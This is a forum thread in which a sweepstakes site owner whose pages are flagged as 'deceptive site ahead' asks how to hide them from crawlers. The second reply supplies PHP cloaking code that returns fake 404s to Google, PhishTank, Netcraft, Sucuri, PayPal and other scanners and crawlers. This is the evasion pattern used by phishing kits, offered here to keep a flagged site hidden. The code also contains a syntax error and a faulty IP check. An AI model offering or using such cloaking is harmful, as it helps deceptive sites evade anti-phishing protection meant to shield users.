increased security alerts since past weekend ? ("deceptive site ahead")

ChrisSch

Newbie
Joined
Sep 30, 2015
Messages
38
Reaction score
4
Running in the sweepstakes niche. My sites get blocked for deceptive content (red warning screen) and this started this past weekend (around June 26).
Appears to be some update.
Up until this weekend without issues. Just now I'm getting flagged left and right and pretty much immediately.

My guess is that I"m caught up in this most recent Spam update even though I don't care about organic search (I use other ways to generate traffic)

Is there a way to hide my pages from bots/crawlers? I have Robots.txt included, doesn't matter, they crawl anyway. How do I hide my folders?

Anyone can drop me a hint?
 
search for .htaccess 7G Firewall , block whatever bot you want (some list is already included, you'll see what to edit). Also trivial thing to block it with php, include script to any page that you want (or entire site) , something like

PHP:
<?php

//block by hosts
$hostname = gethostbyaddr($_SERVER['REMOTE_ADDR']);
$blocked_hosts = array("google", "softlayer", "amazonaws", "cyveillance", "phishtank", "dreamhost", "netpilot", "calyxinstitute", "tor-exit", "msnbot", "netcraft", "paypal", "torservers", "messagelabs", "sucuri.net", "crawler", "baidu", , "baidubot", "applebot", "java", "PhantomJS", "metauri.com", "Twitterbot", "above");

foreach ($blocked_hosts as $host) {
    if (substr_count($hostname, $host) > 0) {
        header("HTTP/1.0 404 Not Found");
        die("<h1>404 Not Found</h1>The page that you have requested could not be found.");

    }
}

//block by user-agent
$uagents = array('Googlebot','Baiduspider','PhantomJS', 'applebot', 'metauri.com', 'ia_archiver', 'NetcraftSurveyAgent', 'Sogou web spider', 'bingbot', 'Yahoo! Slurp', 'facebookexternalhit', 'msnbot', 'Twitterbot', 'urlresolver', 'Butterfly', 'MJ12bot', 'AhrefsBot', 'Exabot', 'YandexBot', 'TweetedTimes Bot', 'magpie-crawler', 'Mediapartners-Google', 'Spinn3r', 'InAGist', 'Python-urllib', 'NING', 'TencentTraveler', 'Feedfetcher-Google', 'mon.itor.us', 'spbot', 'Feedly', 'bot', 'java', 'curl', 'spider', 'python', 'crawler');

foreach ($uagents as $agent) {
    if (strpos($_SERVER['HTTP_USER_AGENT'], $agent) !== false) {
        header("HTTP/1.0 404 Not Found");
        die("<h1>404 Not Found</h1>The page that you have requested could not be found.");
    }
}

//block by IP address
$blockIP = array("^46.116.*.* ", "^62.90.*.*", "^89.138.*.*", "^82.166.*.*", "^85.64.*.*", "^85.250.*.*", "^89.138.*.*"); //add your IP's
if (in_array($_SERVER['REMOTE_ADDR'], $blockIP)) {
    header('HTTP/1.0 404 Not Found');
    exit();

} else {
    foreach ($blockIP as $ip) {
        if (preg_match('/' . $ip . '/', $_SERVER['REMOTE_ADDR'])) {
            header('HTTP/1.0 404 Not Found');
             die("<h1>404 Not Found</h1>The page that you have requested could not be found.");
        }
    }
}

?>


But if someone report your site directly to specific sites, there is not much of use any blocking. Also automated search for specific patterns and strings that can be found in pages like yours are messing with your business. Also not all bots will present themselves as bots, they use regular user agents that you don't want to block... etc
 
Last edited:
The Google update is not related to your problem by any means,
It doesn't affect anything outside the SERPs and rankings
Make sure your website runs with a valid SSL, check if it's hacked and any type of pages/scripts/files are added by checking the SERPs (recently added pages) & files,
It could possibly be a false positive which you can report here: https://safebrowsing.google.com/safebrowsing/report_error/?hl=en
 
Back
Top